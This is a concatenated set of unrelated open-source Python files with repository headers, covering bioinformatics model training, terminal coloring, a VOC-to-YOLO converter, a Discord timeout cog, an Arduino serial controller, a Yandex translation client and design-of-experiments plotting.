y_pred = self.model.predict([self.en, self.pr])
auc_val = roc_auc_score(self.y, y_pred)
aupr_val = average_precision_score(self.y, y_pred)
self.model.save_weights("./model/specificModel/%sModel%d.h5" % (self.name, epoch))
print('\r auc_val: %s ' % str(round(auc_val, 4)), end=100 * ' ' + '\n')
print('\r aupr_val: %s ' % str(round(aupr_val, 4)), end=100 * ' ' + '\n')
return
def on_batch_begin(self, batch, logs={}):
return
def on_batch_end(self, batch, logs={}):
return
# names = ['HUVEC', 'HeLa-S3', 'K562', 'NHEK', 'all', 'all-NHEK']
msgs = []
names = ['GM12878', 'HUVEC', 'HeLa-S3', 'IMR90', 'K562', 'NHEK']
for name in names:
start = time.time()
t1 = datetime.now().strftime('%Y-%m-%d-%H:%M:%S')
# The data used here is the sequence processed by data_processing.py.
Data_dir = '../data/epivan/%s/' % name
train = np.load(Data_dir + '%s_train.npz' % name)
# test=np.load(Data_dir+'%s_test.npz'%name)
X_en_tra, X_pr_tra, y_tra = train['X_en_tra'], train['X_pr_tra'], train['y_tra']
# X_en_tes,X_pr_tes,y_tes=test['X_en_tes'],test['X_pr_tes'],test['y_tes']
X_en_tra, X_en_val, X_pr_tra, X_pr_val, y_tra, y_val = train_test_split(
X_en_tra, X_pr_tra, y_tra, test_size=0.05, stratify=y_tra, random_state=250)
model = get_model()
model.summary()
print('Traing %s cell line specific model...' % name)
back = roc_callback(val_data=[X_en_val, X_pr_val, y_val], name=name)
history = model.fit([X_en_tra, X_pr_tra], y_tra, validation_data=([X_en_val, X_pr_val], y_val), epochs=15,
batch_size=64,
callbacks=[back])
t2 = datetime.now().strftime('%Y-%m-%d-%H:%M:%S')
msg = name + " 开始时间:" + t1 + " 结束时间:" + t2 + " spend time: " + time_since(start)
print(msg)
msgs.append(msg)
for msg in msgs:
print(msg)
```
#### File: StackEPI/sequence_process/sequence_process_dpcp.py
```python
import os
import sys
root_path = os.path.abspath(os.path.dirname(__file__)).split('src')
sys.path.extend([root_path[0] + 'src'])
from sequence_process.DPCP import DPCP
import numpy as np
from sequence_process.sequence_process_def import get_cell_line_seq
names = ['GM12878', 'HeLa-S3', 'HUVEC', 'IMR90', 'K562', 'NHEK']
cell_name = names[7]
feature_name = "dpcp"
feature_dir, \
enhancers_tra, promoters_tra, y_tra, \
im_enhancers_tra, im_promoters_tra, \
y_imtra, enhancers_tes, promoters_tes, y_tes = get_cell_line_seq(data_source, cell_name, feature_name)
set_pc_list = ["Base stacking", "Protein induced deformability", "B-DNA twist", "A-philicity", "Propeller twist",
"Duplex stability (freeenergy)", "Duplex stability (disruptenergy)", "DNA denaturation",
"Bending stiffness", "Protein DNA twist", "Stabilising energy of Z-DNA", "Aida_BA_transition",
"Breslauer_dG", "Breslauer_dH", "Breslauer_dS", "Electron_interaction", "Hartman_trans_free_energy",
"Helix-Coil_transition", "Ivanov_BA_transition", "Lisser_BZ_transition", "Polar_interaction"]
def get_data(enhancers, promoters):
dpcp = DPCP(2, set_pc_list, n_jobs=1)
X_en = dpcp.run_DPCP(enhancers)
# print(X_en)
X_pr = dpcp.run_DPCP(promoters)
# print(X_pr)
return np.array(X_en), np.array(X_pr)
"""
get and save
"""
X_en_tra, X_pr_tra = get_data(enhancers_tra, promoters_tra)
np.savez(feature_dir + '%s_train.npz' % cell_name, X_en_tra=X_en_tra, X_pr_tra=X_pr_tra, y_tra=y_tra)
if data_source == "epivan":
X_en_imtra, X_pr_imtra = get_data(im_enhancers_tra, im_promoters_tra)
np.savez(feature_dir + 'im_%s_train.npz' % cell_name, X_en_tra=X_en_imtra, X_pr_tra=X_pr_imtra, y_tra=y_imtra)
X_en_tes, X_pr_tes = get_data(enhancers_tes, promoters_tes)
np.savez(feature_dir + '%s_test.npz' % cell_name, X_en_tes=X_en_tes, X_pr_tes=X_pr_tes, y_tes=y_tes)
``` |
{
"source": "2004lkw/PyColorTerm",
"score": 4
} |
#### File: 2004lkw/PyColorTerm/colortxt.py
```python
class ColorsFore:
"""
colors for the terminal foreground
"""
BLACK = 30
RED = 31
GREEN = 32
YELLOW = 33
BLUE = 34
PURPLE = 35
CYAN = 36
WHITE = 37
class ColorsBack:
"""
colors for the terminal background
"""
BLACK = 40
RED = 41
GREEN = 42
YELLOW = 43
BLUE = 44
PURPLE = 45
CYAN = 46
WHITE = 47
class ColorsStyle:
"""
Styles used for the terminal.
"""
NONE = 0
_BRIGHT = 1
DARK = 2
ITALIC =3
UNDERLINE = 4
_LIGHTBACK = 5
_LIGHTBACK2 = 6
INVERT = 7
class ColorsCode:
"""
Escape codes used on the terminal.
"""
prefix = "\x1b["
postfix = "\x1b[0m"
def colorstr(style="NONE", fore="WHITE", back="BLACK", text=""):
"""
Formats a string with color codes and returns it.
:param style: Use none, dark, italic, underline or invert.
:param fore: Use Black, Red, Green, Yellow, Blue, Purple, Cyan, or White.
:param back: Use Black, Red, Green, Yellow, Blue, Purple, Cyan, or White.
:param text: This is the text you wish to format.
:returns: Returns the text, formatted with the codes needed to produce the colors.
"""
# Style, Fore, Back. Set defaults.
useStyle = ColorsStyle.NONE
useFore = ColorsFore.WHITE
useBack = ColorsBack.BLACK
# make easier to decide.
style = style.lower().strip()
fore = fore.lower().strip()
back = back.lower().strip()
# figure out the style.
if style == "dark":
useStyle = ColorsStyle.DARK
elif style=="italic":
useStyle = ColorsStyle.ITALIC
elif style == "underline":
useStyle=ColorsStyle.UNDERLINE
elif style == "invert":
useStyle = ColorsStyle.INVERT
#Figure out the foreground.
if fore == "black":
useFore = ColorsFore.BLACK
elif fore == "green":
useFore = ColorsFore.GREEN
elif fore == "yellow":
useFore = ColorsFore.YELLOW
elif fore == "blue":
useFore = ColorsFore.BLUE
elif fore == "purple":
useFore = ColorsFore.PURPLE
elif fore == "cyan":
useFore = ColorsFore.CYAN
elif fore == "white":
useFore = ColorsFore.WHITE
elif fore == "red":
useFore = ColorsFore.RED
#Figure out the background.
if back == "black":
useBack = ColorsBack.BLACK
elif back == "green":
useBack = ColorsBack.GREEN
elif back == "yellow":
useBack = ColorsBack.YELLOW
elif back == "blue":
useBack = ColorsBack.BLUE
elif back == "purple":
useBack = ColorsBack.PURPLE
elif back == "cyan":
useBack = ColorsBack.CYAN
elif back == "white":
useBack = ColorsBack.WHITE
elif back == "red":
useBack = ColorsBack.RED
colorsOut = ";".join([str(useStyle),str(useFore),str(useBack)])
valOut = '%s%sm%s%s' % (ColorsCode.prefix,colorsOut,text,ColorsCode.postfix)
return valOut
def colortxt(fore="WHITE", back="BLACK", text=""):
"""
Formats a string with color codes and returns it using normal style.
:param fore: Use Black, Red, Green, Yellow, Blue, Purple, Cyan, or White.
:param back: Use Black, Red, Green, Yellow, Blue, Purple, Cyan, or White.
:param text: This is the text you wish to format.
:returns: Returns the text, formatted with the codes needed to produce the colors.
"""
return colorstr("none",fore,back,text)
def foretxt(fore="WHITE", text = ""):
"""
Formats a string with color foreground on black.
:param fore: Use Black, Red, Green, Yellow, Blue, Purple, Cyan, or White.
:param text: This is the text you wish to format.
:returns: Returns the text, formatted with the codes needed to produce the colors.
"""
return colorstr(fore=fore,text=text)
``` |
{
"source": "2005606/arcface-tf2-new",
"score": 3
} |
#### File: arcface-tf2-new/modules/utils.py
```python
import yaml
import numpy as np
import tensorflow as tf
from absl import logging
def set_memory_growth():
gpus = tf.config.experimental.list_physical_devices('GPU')
if gpus:
try:
# Currently, memory growth needs to be the same across GPUs
for gpu in gpus:
tf.config.experimental.set_memory_growth(gpu, True)
logical_gpus = tf.config.experimental.list_logical_devices(
'GPU')
logging.info(
"Detect {} Physical GPUs, {} Logical GPUs.".format(
len(gpus), len(logical_gpus)))
except RuntimeError as e:
# Memory growth must be set before GPUs have been initialized
logging.info(e)
def load_yaml(load_path):
"""load yaml file"""
with open(load_path, 'r') as f:
loaded = yaml.load(f, Loader=yaml.Loader)
return loaded
def get_ckpt_inf(ckpt_path, steps_per_epoch):
"""get ckpt information"""
split_list = ckpt_path.split('e_')[-1].split('_b_')
epochs = int(split_list[0])
batchs = int(split_list[-1].split('.ckpt')[0])
steps = (epochs - 1) * steps_per_epoch + batchs
return epochs, steps + 1
def l2_norm(x, axis=1):
"""l2 norm"""
norm = np.linalg.norm(x, axis=axis, keepdims=True)
output = x / norm
return output
``` |
{
"source": "2007743/Converter-from-PASCAL-VOC-to-YOLO",
"score": 3
} |
#### File: 2007743/Converter-from-PASCAL-VOC-to-YOLO/Convertor UI.py
```python
import os
from PIL import Image
import PySimpleGUI as sg
def datafolder():
while True:
sg.set_options(auto_size_buttons=True)
sg.theme('dark grey 9')
foldername = sg.popup_get_folder(
'Укажите путь до путь до папки с фото.',
title='Conventor', no_titlebar=True, grab_anywhere=True)
if foldername == '':
return
folder = sg.popup_yes_no('Вы указали путь до путь до папки с фото?', no_titlebar=True, grab_anywhere=True)
if folder == 'Yes':
if foldername is not None:
try:
print(foldername)
return foldername
except:
sg.popup_error('Error reading file')
return
elif folder != 'No':
break
def datacords():
while True:
sg.set_options(auto_size_buttons=True)
sg.theme('dark grey 9')
cordsname = sg.popup_get_file(
'Укажите путь до файла где указаны названия фото и после кординаты.',
title='Conventor', no_titlebar=True, grab_anywhere=True)
if cordsname == '':
return
cords = sg.popup_yes_no('Вы указали путь до файла с указаными названия фото и кординатами?', no_titlebar=True, grab_anywhere=True)
if cords == 'Yes':
if cordsname is not None:
try:
print(cordsname)
return cordsname
except:
sg.popup_error('Error reading file')
return
elif cords != 'No':
break
def dataclasses():
while True:
sg.set_options(auto_size_buttons=True)
sg.theme('dark grey 9')
classesname = sg.popup_get_file(
'Укажите путь до файла где указаны классы которые будут использоваться у вас во время обучения нейронной '
'сети.', title='Conventor', no_titlebar=True, grab_anywhere=True)
if classesname == '':
return
classes = sg.popup_yes_no('Вы указали путь до файла где указаны классы которые будут использоваться у вас во '
'время обучения нейронной?', no_titlebar=True, grab_anywhere=True)
if classes == 'Yes':
if classesname is not None:
try:
print(classesname)
return classesname
except:
sg.popup_error('Error reading file')
return
elif classes != 'No':
break
def dataimgclasses():
while True:
sg.set_options(auto_size_buttons=True)
sg.theme('dark grey 9')
imgclassesname = sg.popup_get_file(
'Укажите путь до файла где указаны названия фото и классы которые вы указаны в файле classes.',
title='Conventor', no_titlebar=True, grab_anywhere=True)
if imgclassesname == '':
return
imgclasses = sg.popup_yes_no('Вы указали путь до файла где указаны названия фото и классы которые вы указаны '
'в файле classes?', no_titlebar=True, grab_anywhere=True)
if imgclasses == 'Yes':
if imgclassesname is not None:
try:
print(imgclassesname)
return imgclassesname
except:
sg.popup_error('Error reading file')
break
elif imgclasses != 'No':
break
break
folder_images = datafolder()
size_images = dict()
line = open(f'{datacords()}', 'r').readlines()
naz = open(f'{dataimgclasses()}', 'r').readlines()
name1 = open(f"{dataclasses()}", 'r').readlines()
def convert(size, box):
dw = 1. / (size[0])
dh = 1. / (size[1])
x = (box[0] + box[1]) / 2.0 - 1
y = (box[2] + box[3]) / 2.0 - 1
w = box[1] - box[0]
h = box[3] - box[2]
x = x * dw
w = w * dw
y = y * dh
h = h * dh
return (x, y, w, h)
def razresh(name):
try:
for dirpath, _, filenames in os.walk(folder_images):
for path_image in filenames:
image = os.path.abspath(os.path.join(dirpath, path_image))
try:
with Image.open(image) as img:
width, heigth = img.size
size_images[path_image] = {'width': width, 'heigth': heigth}
except:
a = 'wqewqeqwe'
s = size_images.get(f'{name}.jpg')
return s.get("width"), s.get("heigth")
except:
a = "qweqwewqe"
def nazv1():
nazv = {}
for x in naz:
t = x.split(" ", maxsplit=1)
nazv.update({str(t[0]): str(t[1].rstrip())})
return nazv
def convertor():
for f in line:
name = {}
i = f.rstrip().split(' ')
xywh = float(i[1]), float(i[3]), float(i[2]), float(i[4])
nazvanie = i[0]
if os.path.isfile(
f'{folder_images}\{nazvanie}.jpg'): # Specify the path to the folder where the images are located
if not os.path.isfile(
f'.{folder_images}\{nazvanie}.txt'): # Specify the path to the folder where the pictures are located to save the description of the photo to this folder already in YOLO format
youlo = convert(razresh(nazvanie), (xywh))
nazv3 = nazv1()[nazvanie]
for x, rt in enumerate(name1):
name.update({rt.rstrip(): x})
if x == 69:
name23 = name[nazv3]
o = open(f'{folder_images}\{nazvanie}.txt',
'w') # Specify the path the same path that you specified before
o1 = o.write(f'{name23} {youlo[0]} {youlo[1]} {youlo[2]} {youlo[3]}')
else:
v = 0
if __name__ == '__main__':
datacords()
dataclasses()
dataimgclasses()
convertor()
``` |
{
"source": "200percentmicky/MickyCogs",
"score": 3
} |
#### File: MickyCogs/timeouts/timeouts.py
```python
from datetime import datetime, timedelta
import discord
from redbot.core import commands, modlog, checks
class InTimeout(Exception):
"""
Exception for when a member is on timeout.
"""
pass
class NotInTimeout(Exception):
"""
Exception for when a member is not in timeout.
"""
pass
class TimeExceeded(Exception):
"""
Raised when the time provided exceeds the limits of 28 days. (40320 minutes)
"""
pass
def timeout_payload(until: int = None):
"""
Initial payload to provide to the API.
"""
timeout = (datetime.utcnow() + until).isoformat() if until else None
payload = {'communication_disabled_until': timeout}
return payload
async def timeout_user(bot, user_id: int, guild_id: int, reason: str, until):
"""
Timeout users in minutes.
"""
if until > timedelta(days=28):
raise TimeExceeded()
member = await bot.http.get_member(guild_id, user_id)
if member['communication_disabled_until'] is None:
return await bot.http.edit_member(guild_id, user_id, reason=reason, **timeout_payload(until - timedelta(seconds=1)))
else:
raise InTimeout()
async def untimeout_user(bot, user_id: int, guild_id: int, reason: str):
"""
Removes the timeout from the user.
"""
member = await bot.http.get_member(guild_id, user_id)
if member['communication_disabled_until'] is not None:
return await bot.http.edit_member(guild_id, user_id, reason=reason, **timeout_payload(None))
else:
raise NotInTimeout()
class Timeouts(commands.Cog):
"""
Timeouts for Red V3
"""
def __init__(self, bot):
self.bot = bot
async def initialize(self):
await self.register_casetypes()
@staticmethod
async def register_casetypes():
timeout_types = [
{
"name": "timeout",
"default_setting": True,
"image": "\N{TIMER CLOCK}",
"case_str": "Timed Mute"
},
{
"name": "remove_timeout",
"default_setting": True,
"image": "💥",
"case_str": "Remove Timed Mute"
}
]
try:
await modlog.register_casetypes(timeout_types)
except RuntimeError:
pass
@commands.command()
@checks.mod() # Recommended. The library doesn't have the "Moderate Members" permission stored, so bits will be used.
async def timeout(
self,
ctx: commands.Context,
member: discord.Member,
until: commands.TimedeltaConverter,
*,
reason: str = None
):
"""
Puts a member on timeout with the time specified in minutes.
`<member>` The member you want to put on timeout.
`<until>` How long the member should be on timeout in minutes.
`[reason]` The reason for the timeout.
"""
if ctx.author.id == member.id:
return await ctx.send("You can't place yourself on timeout.")
try:
async with ctx.typing():
await timeout_user(self.bot, user_id=member.id, guild_id=ctx.guild.id, until=until, reason=reason)
await modlog.create_case(
ctx.bot, ctx.guild, ctx.message.created_at, action_type="timeout",
user=member, moderator=ctx.author, reason=reason,
until=datetime.utcnow() + until - timedelta(seconds=1)
)
await ctx.send("Done. Time away will do them good.")
except discord.Forbidden:
await ctx.send("I'm not allow to do that for some reason.")
except TimeExceeded:
await ctx.send("Invalid time given. Max time is 28 days.")
except InTimeout:
await ctx.send("That member is already on timeout.")
@commands.command()
@checks.mod() # Recommended. The library doesn't have the "Moderate Members" permission stored, so bits will be used.
async def untimeout(self, ctx: commands.Context, member: discord.Member, *, reason: str = None):
"""
Removes a members timeout, if one is in place.
`<member>` The member you want to remove the timeout from.
`[reason]` The reason for removing their timeout.
"""
if ctx.author.id == member.id:
return await ctx.send("You can't place yourself on timeout.")
try:
async with ctx.typing():
await untimeout_user(self.bot, user_id=member.id, guild_id=ctx.guild.id, reason=reason)
await modlog.create_case(
ctx.bot, ctx.guild, ctx.message.created_at, action_type="remove_timeout",
user=member, moderator=ctx.author, reason=reason
)
await ctx.send(f"Done. Hope they learned their lesson.")
except discord.Forbidden:
await ctx.send("I'm not allow to do that.")
except NotInTimeout:
await ctx.send("That member is not in timeout.")
``` |
{
"source": "2010019970909/Arduino-PWM-Serial-Control",
"score": 3
} |
#### File: Arduino-PWM-Serial-Control/Python_Control/main.py
```python
from time import sleep
import serial
import serial.tools.list_ports
DELAY = 0.1
PORT_INDEX = 0
def main():
# List ports
ports = [comport.device for comport in serial.tools.list_ports.comports()]
n_ports = len(ports)
print('Ports list:', ports)
if n_ports:
# Open port
with serial.Serial(ports[PORT_INDEX], 115200) as ser:
print(ser.readline().decode('UTF8'), end='')
# Increase and decrease a value from 0 to 255
while 1:
for i in range(0, 256):
ser.write(str(i).encode('UTF8'))
print(ser.readline().decode('UTF8'), end='')
sleep(DELAY)
for i in range(1, 255):
ser.write(str(255 - i).encode('UTF8'))
print(ser.readline().decode('UTF8'), end='')
sleep(DELAY)
if __name__ == '__main__':
main()
``` |
{
"source": "2010019970909/deep-translator",
"score": 3
} |
#### File: deep-translator/deep_translator/yandex.py
```python
import requests
from .constants import BASE_URLS
from .exceptions import (RequestError, ServerException,
TranslationNotFound, TooManyRequests)
from .parent import BaseTranslator
class YandexTranslator(object):
"""
class that wraps functions, which use the yandex translator under the hood to translate word(s)
"""
def __init__(self, api_key=None, source="en", target="de", **kwargs):
"""
@param api_key: your yandex api key
"""
if not api_key:
raise ServerException(401)
self.__base_url = BASE_URLS.get("YANDEX")
self.source = source
self.target = target
self.api_key = api_key
self.api_version = "v1.5"
self.api_endpoints = {
"langs": "getLangs",
"detect": "detect",
"translate": "translate",
}
@staticmethod
def get_supported_languages(as_dict=False, **kwargs):
""" this method is just for consistency."""
return """ this method is just for consistency. You need to create an instance of yandex and access
supported languages using the languages property or call _get_supported_languages
"""
def _get_supported_languages(self):
return set(x.split("-")[0] for x in self.dirs)
@property
def languages(self):
return self.get_supported_languages()
@property
def dirs(self, proxies=None):
try:
url = self.__base_url.format(
version=self.api_version, endpoint="getLangs")
print("url: ", url)
response = requests.get(
url, params={"key": self.api_key}, proxies=proxies)
except requests.exceptions.ConnectionError:
raise ServerException(503)
else:
data = response.json()
if response.status_code != 200:
raise ServerException(response.status_code)
return data.get("dirs")
def detect(self, text, proxies=None):
response = None
params = {
"text": text,
"format": "plain",
"key": self.api_key,
}
try:
url = self.__base_url.format(
version=self.api_version, endpoint="detect")
response = requests.post(url, data=params, proxies=proxies)
except RequestError:
raise
except ConnectionError:
raise ServerException(503)
except ValueError:
raise ServerException(response.status_code)
else:
response = response.json()
language = response['lang']
status_code = response['code']
if status_code != 200:
raise RequestError()
elif not language:
raise ServerException(501)
return language
def translate(self, text, proxies=None, **kwargs):
params = {
"text": text,
"format": "plain",
"lang": self.target if self.source == "auto" else "{}-{}".format(self.source, self.target),
"key": self.api_key
}
try:
url = self.__base_url.format(
version=self.api_version, endpoint="translate")
response = requests.post(url, data=params, proxies=proxies)
except ConnectionError:
raise ServerException(503)
else:
response = response.json()
if response['code'] == 429:
raise TooManyRequests()
if response['code'] != 200:
raise ServerException(response['code'])
if not response['text']:
raise TranslationNotFound()
return response['text']
def translate_file(self, path, **kwargs):
"""
translate from a file
@param path: path to file
@return: translated text
"""
try:
with open(path, 'r', encoding='utf-8') as f:
text = f.read()
return self.translate(text)
except Exception as e:
raise e
def translate_batch(self, batch, **kwargs):
"""
translate a batch of texts
@param batch: list of texts to translate
@return: list of translations
"""
return [self.translate(text, **kwargs) for text in batch]
BaseTranslator.register(YandexTranslator)
``` |
{
"source": "2010019970909/design_of_experiments",
"score": 3
} |
#### File: design_of_experiments/src/design_of_experiments.py
```python
__author__ = "<NAME>"
# Maths modules
from itertools import permutations, combinations
from scipy.special import erfinv
import numpy as np
# Plotting module
import matplotlib.pyplot as plt
def gen_design(n: int = 2, perm=None):
"""
Generate the design matrix for factorial design of experiments (2**n)
n:
The number of factors to analyse
perm:
A permutation vector of size 2**n
"""
set_matrix = set()
for i in range(n + 1):
# https://stackoverflow.com/a/41210386 for the permutation
# https://stackoverflow.com/a/29648719 for the update of the set
set_matrix.update(set(permutations((n-i)*[-1] + i*[1])))
# Tranform the matrix to fit the example (Table 10.4.1)
# https://docs.scipy.org/doc/numpy/reference/generated/numpy.flip.html to flip the matrix along the Y axis
if perm:
return np.flip(np.array(sorted(set_matrix, reverse=True)))[perm]
return np.flip(np.array(sorted(set_matrix, reverse=True)))
def gen_X(n: int = 2, perm=None, show: bool = False, return_head: bool = False):
"""
Generate the X matrix to compute the a_i coefficents for a 2**n DoE.
n:
The number of factors to analyse
perm:
A permutation vector of size 2**n
show:
If True print the head and the matrix X and return (X, head)
Else only return X
return_head:
If True, return (X, head)
"""
DoE = gen_design(n=n, perm=perm)
X = np.c_[(2**n)*[1], DoE]
if show:
head = ['I']
for i in range(n):
# Generate the combinations for i position
combs = sorted(set(combinations(range(1, n+1), i+1)))
for comb in combs:
# Generate the column name
head.append(str(list(comb)).replace('[', '').replace(
']', '').replace(' ', '').replace(',', '•'))
for i in range(n-1):
# Generate the combinations for i+2 position
combs = sorted(set(combinations(range(n), i+2)))
for comb in combs:
# Generate the column by combination
temp_col = (2**n)*[1]
for j in list(comb):
temp_col = np.multiply(temp_col, DoE[:, j])
# Add the column to the matrix
X = np.c_[X, temp_col]
if show:
print(head)
print(X)
return X, head
if return_head:
return X, head
return X
def gen_a_labels(n: int = 2):
"""
Generate a list of labels for the a_i coefficients.
n:
The number of factors to analyse
"""
head = [r'$\^a_{0}$']
for i in range(n):
# Generate the combinations for i position
combs = sorted(set(combinations(range(1, n+1), i+1)))
for comb in combs:
# Generate the column name
head.append(r"$\^a_{" + str(list(comb)).replace('[', '').replace(
']', '').replace(' ', '').replace(',', r' \cdot ') + "}$")
return head
def gen_X_hat(n: int = 2, perm=None, show: bool = False):
"""
Generate the matrix X_hat = (X^T * X)^-1 * X^T
n:
The number of factors to analyse
perm:
A permutation vector of size 2**n
show:
If True print the head, the matrix X and X_hat
Else only return X_hat
"""
if show:
X, _ = gen_X(n=n, perm=perm, show=show)
else:
X = gen_X(n=n, perm=perm, show=show)
X_hat = np.dot(np.linalg.inv(np.dot(X.T, X)), X.T)
if show:
print(X_hat)
return X_hat
def draw_coefficents(mpl, coefficents, coefficents_labels=None, remove_a0: bool = False, title: str = "Coefficients bar chart", legend: str = "Coefficients", draw: bool = True, **kwargs):
"""
Draw the bar chart of the coefficients a_i.
coefficents:
A list or an array with the coefficients.
coefficents_labels:
A list or an array with the labels of the coefficient.
title:
The title of the chart.
legend:
Legend to display on the chart.
draw:
Defines if the figure has to be displayed or no.
**kwargs:
Others optional arguments for the plot function (like the color, etc)
"""
# https://matplotlib.org/3.1.1/gallery/lines_bars_and_markers/barchart.html
x = np.arange(len(coefficents))
n = int(np.log2(len(coefficents)))
if coefficents_labels:
labels = coefficents_labels
else:
labels = gen_a_labels(n)
if remove_a0:
coefficents = coefficents[1:]
labels = labels[1:]
x = np.arange(len(coefficents))
# mpl.figure()
mpl.ax.clear()
rects = mpl.ax.bar(x, coefficents, **kwargs)
for rect in rects:
height = rect.get_height()
if height < 0:
va = 'top'
xytext = (0, -3)
else:
va = 'bottom'
xytext = (0, 3)
mpl.ax.annotate('{}'.format(height),
xy=(rect.get_x() + rect.get_width() / 2, height),
xytext=xytext, # 3 points vertical offset
textcoords="offset points",
ha='center', va=va)
mpl.ax.set_title(title)
mpl.ax.set_xticks(x)
mpl.ax.set_xticklabels(labels)
# mpl.ax.grid(which='major')
mpl.ax.legend([legend])
# mpl.tight_layout()
if draw:
mpl.draw()
def plot_coefficents(coefficents, coefficents_labels=None, remove_a0: bool = False, title: str = "Coefficients bar chart", legend: str = "Coefficients", block: bool = False, show: bool = False, **kwargs):
"""
Plot the bar chart of the coefficients a_i.
coefficents:
A list or an array with the coefficients.
coefficents_labels:
A list or an array with the labels of the coefficient.
title:
The title of the chart.
legend:
Legend to display on the chart.
block:
Defines if the plot should block or no the execution of the code.
show:
Defines if the figure has to be displayed or no.
**kwargs:
Others optional arguments for the plot function (like the color, etc)
"""
# https://matplotlib.org/3.1.1/gallery/lines_bars_and_markers/barchart.html
x = np.arange(len(coefficents))
n = int(np.log2(len(coefficents)))
if coefficents_labels:
labels = coefficents_labels
else:
labels = gen_a_labels(n)
if remove_a0:
coefficents = coefficents[1:]
labels = labels[1:]
x = np.arange(len(coefficents))
fig, ax = plt.subplots()
rects = ax.bar(x, coefficents, **kwargs)
for rect in rects:
height = rect.get_height()
if height < 0:
va = 'top'
xytext = (0, -3)
else:
va = 'bottom'
xytext = (0, 3)
ax.annotate('{}'.format(height),
xy=(rect.get_x() + rect.get_width() / 2, height),
xytext=xytext, # 3 points vertical offset
textcoords="offset points",
ha='center', va=va)
ax.set_title(title)
ax.set_xticks(x)
ax.set_xticklabels(labels)
# ax.grid(which='major')
ax.legend([legend])
fig.tight_layout()
if show:
plt.show(block=block)
return fig, ax
def draw_pareto(mpl, coefficents, coefficents_labels=None, remove_a0: bool = True, title: str = "Pareto bar chart", legend: str = "| Coefficients |", draw: bool = True, **kwargs):
"""
Draw the Pareto's bar chart of the coefficients a_i.
coefficents:
A list or an array with the coefficients.
coefficents_labels:
A list or an array with the labels of the coefficient.
title:
The title of the chart.
legend:
Legend to display on the chart.
draw:
Defines if the figure has to be displayed or no.
**kwargs:
Others optional argumentd for the plot function (like the color, etc).
"""
# https://matplotlib.org/3.1.1/gallery/lines_bars_and_markers/barchart.html
l = len(coefficents)
y = np.arange(l)
n = int(np.log2(l))
coefficents = np.abs(coefficents)
if coefficents_labels:
labels = np.array(coefficents_labels, dtype=str)
else:
labels = np.array(gen_a_labels(n), dtype=str)
if remove_a0:
coefficents = coefficents[1:]
labels = labels[1:]
y = np.arange(len(coefficents))
# https://stackoverflow.com/a/7851166
index = sorted(range(len(coefficents)),
key=coefficents.__getitem__, reverse=True)
coefficents = coefficents[index]
labels = labels[index]
# mpl.figure()
mpl.ax.clear()
rects = mpl.ax.barh(y, coefficents, **kwargs)
i = 0
for rect in rects:
x = rect.get_width()
va = 'center'
if i == 0:
xytext = (-4*len(str(x)), 0)
else:
xytext = (4*len(str(x)), 0)
mpl.ax.annotate('{}'.format(x),
xy=(x, i),
xytext=xytext, # 3 points vertical offset
textcoords="offset points",
ha='center', va=va)
i += 1
mpl.ax.set_title(title)
mpl.ax.set_yticks(y)
mpl.ax.set_yticklabels(labels)
# ax.grid(which='major')
mpl.ax.legend([legend])
# mpl.ax.autoscale_view(True,True,True)
# fig.tight_layout()
if draw:
mpl.draw()
def plot_pareto(coefficents, coefficents_labels=None, remove_a0: bool = True, title: str = "Pareto bar chart", legend: str = "| Coefficients |", block: bool = False, show: bool = False, **kwargs):
"""
Plot the Pareto's bar chart of the coefficients a_i.
coefficents:
A list or an array with the coefficients.
coefficents_labels:
A list or an array with the labels of the coefficient.
title:
The title of the chart.
legend:
Legend to display on the chart.
block:
Defines if the plot should block or no the execution of the code.
show:
Defines if the figure has to be displayed or no.
**kwargs:
Others optional argumentd for the plot function (like the color, etc).
"""
# https://matplotlib.org/3.1.1/gallery/lines_bars_and_markers/barchart.html
l = len(coefficents)
y = np.arange(l)
n = int(np.log2(l))
coefficents = np.abs(coefficents)
if coefficents_labels:
labels = np.array(coefficents_labels, dtype=str)
else:
labels = np.array(gen_a_labels(n), dtype=str)
if remove_a0:
coefficents = coefficents[1:]
labels = labels[1:]
y = np.arange(len(coefficents))
# https://stackoverflow.com/a/7851166
index = sorted(range(len(coefficents)),
key=coefficents.__getitem__, reverse=True)
coefficents = coefficents[index]
labels = labels[index]
fig, ax = plt.subplots()
rects = ax.barh(y, coefficents, **kwargs)
i = 0
for rect in rects:
x = rect.get_width()
va = 'center'
if i == 0:
xytext = (-4*len(str(x)), 0)
else:
xytext = (4*len(str(x)), 0)
ax.annotate('{}'.format(x),
xy=(x, i),
xytext=xytext, # 3 points vertical offset
textcoords="offset points",
ha='center', va=va)
i += 1
ax.set_title(title)
ax.set_yticks(y)
ax.set_yticklabels(labels)
# ax.grid(which='major')
ax.legend([legend])
fig.tight_layout()
if show:
plt.show(block=block)
return fig, ax
def draw_henry(mpl, coefficents, coefficents_labels=None, remove_a0: bool = True, empirical_cumulative_distribution: str = "classical", a: float = 0, title: str = "Henry bar chart", legend: str = "| Coefficients |", draw: bool = True, **kwargs):
"""
Draw the Henry's chart of the coefficients a_i.
coefficents:
A list or an array with the coefficients.
coefficents_labels:
A list or an array with the labels of the coefficient.
empirical_cumulative_distribution:
classical - f(i) = i/N
modified - f(i) = (i + a)/(N + 1 + 2a)
title:
The title of the chart.
legend:
Legend to display on the chart.
draw:
Defines if the figure has to be displayed or no.
**kwargs:
Others optional arguments for the plot function (like the color, etc).
"""
l = len(coefficents)
n = int(np.log2(l))
if coefficents_labels:
labels = np.array(coefficents_labels, dtype=str)
else:
labels = np.array(gen_a_labels(n), dtype=str)
if remove_a0:
coefficents = coefficents[1:]
labels = labels[1:]
l = len(coefficents)
# https://stackoverflow.com/a/7851166
index = sorted(range(len(coefficents)),
key=coefficents.__getitem__, reverse=False)
coefficents = coefficents[index]
labels = labels[index]
# Empirical cumulative distribution f(i)
dist = coefficents
if empirical_cumulative_distribution == "classical":
for i in range(l):
dist[i] = (i+1)/l
elif empirical_cumulative_distribution == "modified":
for i in range(l):
dist[i] = (i+1+a)/(l+1+2*a)
else:
print("Error: unknown empirical mode.")
# Corresponding quantile (normit) z(i)
normits = erfinv(2*dist - 1) * np.sqrt(2)
# mpl.figure()
mpl.ax.clear()
mpl.ax.plot(coefficents, normits, marker='1',
linestyle='--', linewidth=0.5, **kwargs)
mpl.ax.set_title(title)
mpl.ax.set_yticks(normits)
mpl.ax.set_yticklabels(labels)
mpl.ax.grid(which='major')
mpl.ax.legend([legend])
# fig.tight_layout()
if draw:
mpl.draw()
def plot_henry(coefficents, coefficents_labels=None, remove_a0: bool = True, empirical_cumulative_distribution: str = "classical", a: float = 0, title: str = "Henry bar chart", legend: str = "| Coefficients |", block: bool = False, show: bool = False, **kwargs):
"""
